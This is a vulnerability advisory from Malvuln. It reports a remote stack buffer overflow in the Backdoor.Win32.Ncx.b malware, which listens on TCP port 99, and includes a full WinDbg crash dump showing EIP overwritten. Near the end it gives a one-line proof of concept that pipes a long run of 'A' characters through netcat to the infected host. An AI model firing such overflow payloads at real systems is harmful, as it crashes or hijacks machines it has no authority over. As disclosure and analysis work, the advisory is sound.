<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/991c1f02c809cee860cb712896a45338_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Ncx.b<br />Vulnerability: Remote Stack Buffer Overflow<br />Description: The malware listens on TCP port 99. Third-party attackers who can reach an infected system can send a large junk payload and trigger a classic stack buffer overflow overwriting the EIP, ECX registers.<br />Type: PE32<br />MD5: 991c1f02c809cee860cb712896a45338<br />Vuln ID: MVID-2021-0422<br />ASLR: False<br />DEP: False<br />Safe SEH: True<br />Disclosure: 12/11/2021<br /><br />Memory Dump:<br />(f40.12a4): Access violation - code c0000005 (first/second chance not available)<br />eax=00000000 ebx=00000000 ecx=41414141 edx=77729d70 esi=00000000 edi=00000000<br />eip=41414141 esp=03051660 ebp=03051680 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />41414141 ?? ???<br /><br />0:003> .ecxr<br />eax=00000000 ebx=00000000 ecx=41414141 edx=77729d70 esi=00000000 edi=00000000<br />eip=41414141 esp=03051660 ebp=03051680 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />41414141 ?? ???<br />0:003> !analyze -v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br />*** WARNING: Unable to verify checksum for Backdoor.Win32.Ncx.b.991c1f02c809cee860cb712896a45338.exe<br />*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Ncx.b.991c1f02c809cee860cb712896a45338.exe<br /><br />FAULTING_IP: <br />Backdoor_Win32_Ncx_b_991c1f02c809cee860cb712896a45338+1555<br />00401555 88443418 mov byte ptr [esp+esi+18h],al<br /><br />EXCEPTION_RECORD: 0314f9f4 -- (.exr 0x314f9f4)<br />ExceptionAddress: 00401555 (Backdoor_Win32_Ncx_b_991c1f02c809cee860cb712896a45338+0x00001555)<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 00000001<br /> Parameter[1]: 03150000<br />Attempt to write to address 03150000<br /><br />PROCESS_NAME: Backdoor.Win32.Ncx.b.991c1f02c809cee860cb712896a45338.exe<br /><br />ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_PARAMETER1: 00000008<br /><br />EXCEPTION_PARAMETER2: 41414141<br /><br />WRITE_ADDRESS: 41414141 <br /><br />FOLLOWUP_IP: <br />Backdoor_Win32_Ncx_b_991c1f02c809cee860cb712896a45338+1555<br />00401555 88443418 mov byte ptr [esp+esi+18h],al<br /><br />FAILED_INSTRUCTION_ADDRESS: <br />+1555<br />41414141 ?? ???<br /><br />MOD_LIST: <ANALYSIS/><br /><br />NTGLOBALFLAG: 0<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />IP_ON_HEAP: 027d0b40<br />The fault address in not in any loaded module, please check your build's rebase<br />log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may<br />contain the address if it were loaded.<br /><br />IP_IN_FREE_BLOCK: 41414141<br /><br />CONTEXT: 0314fa44 -- (.cxr 0x314fa44)<br />eax=00000041 ebx=7745e250 ecx=5804cfad edx=0314fdc4 esi=00000144 edi=027d0b40<br />eip=00401555 esp=0314fea4 ebp=740a1e90 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202<br />Backdoor_Win32_Ncx_b_991c1f02c809cee860cb712896a45338+0x1555:<br />00401555 88443418 mov byte ptr [esp+esi+18h],al ss:002b:03150000=??<br />Resetting default scope<br /><br />FAULTING_THREAD: ffffffff<br /><br />BUGCHECK_STR: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />PRIMARY_PROBLEM_CLASS: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />DEFAULT_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />LAST_CONTROL_TRANSFER: from 027d0b40 to 00401555<br /><br />FRAME_ONE_INVALID: 1<br /><br />STACK_TEXT: <br />0314fea4 00401555 backdoor_win32_ncx_b+0x1555<br />0314fea8 027d0b40 unknown!unknown+0x0<br /><br /><br />STACK_COMMAND: .cxr 000000000314FA44 ; kb ; dds 314fea4 ; kb<br /><br />SYMBOL_STACK_INDEX: 0<br /><br />SYMBOL_NAME: backdoor_win32_ncx_b+1555<br /><br />FOLLOWUP_NAME: MachineOwner<br /><br />MODULE_NAME: Backdoor_Win32_Ncx_b_991c1f02c809cee860cb712896a45338<br /><br />IMAGE_NAME: Backdoor.Win32.Ncx.b.991c1f02c809cee860cb712896a45338.exe<br /><br />DEBUG_FLR_IMAGE_TIMESTAMP: 34ae8eb9<br /><br />BUCKET_ID: APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_backdoor_win32_ncx_b+1555<br /><br />FAILURE_BUCKET_ID: STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Ncx.b.991c1f02c809cee860cb712896a45338.exe!Unknown<br /><br /><br />Exploit/PoC:<br />python -c "print('A'*3306)" | nc64.exe MALWARE_HOST 99<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>